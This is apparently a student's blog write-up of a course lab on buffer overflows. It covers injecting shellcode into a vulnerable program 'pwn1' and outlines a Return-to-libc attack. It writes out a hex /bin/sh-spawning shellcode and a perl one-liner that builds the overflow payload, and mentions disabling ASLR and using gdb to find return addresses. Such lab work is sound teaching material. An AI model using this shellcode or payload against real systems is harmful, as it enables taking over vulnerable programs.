20145315《网络对抗》——注入shellcode以及 Return-to-libc攻击实验

shellcode

准备一段Shellcode

我用的老师的shellcode:\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00

环境设置

  • 设置堆栈可执行
  • 关闭地址随机化

然后,跳进了坑里

  • 用结构为:nops+shellcode+retaddr进行了shellcode注入
  • 6个nop+shellcode+返回地址,返回地址先用\x4\x3\x2\x1代替,之后确定具体值
  • 准备好了注入文件用00结尾
  • 然后把shellcode注入pwn1

确定注入的shellcode的地址

  • 打开一个新的终端,进行GDB调试
  • 设置断点
  • 寻找esp指向的地址
  • 在附近寻找shellcode的地址
  • 然后继续执行,确定返回地址所占的位置是否正确

失败了

然后,把\x4\x3\x2\x1替换为内存中shellcode的地址
注入后运行shell,失败,原因是指令被覆盖了

从坑里爬起来继续

  • 这次构造的是结构为:anything+retaddr+nops+shellcode
  • perl -e 'print "A" x 32;print "\x30\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
  • 成功

Return-to-libc攻击实验

准备工作,使用另一个 shell 程序(zsh)代替/bin/bash。

漏洞程序

  • retlib
  • 编译该程序,并设置 SET-UID

读取环境变量的程序

攻击程序

获取内存地址

gdb 获得 system 和 exit 地址

修改 exploit.c 文件,填上刚才找到的内存地址

攻击

posted @ 2017-03-08 20:28  君知らない  阅读(384)  评论(0编辑  收藏  举报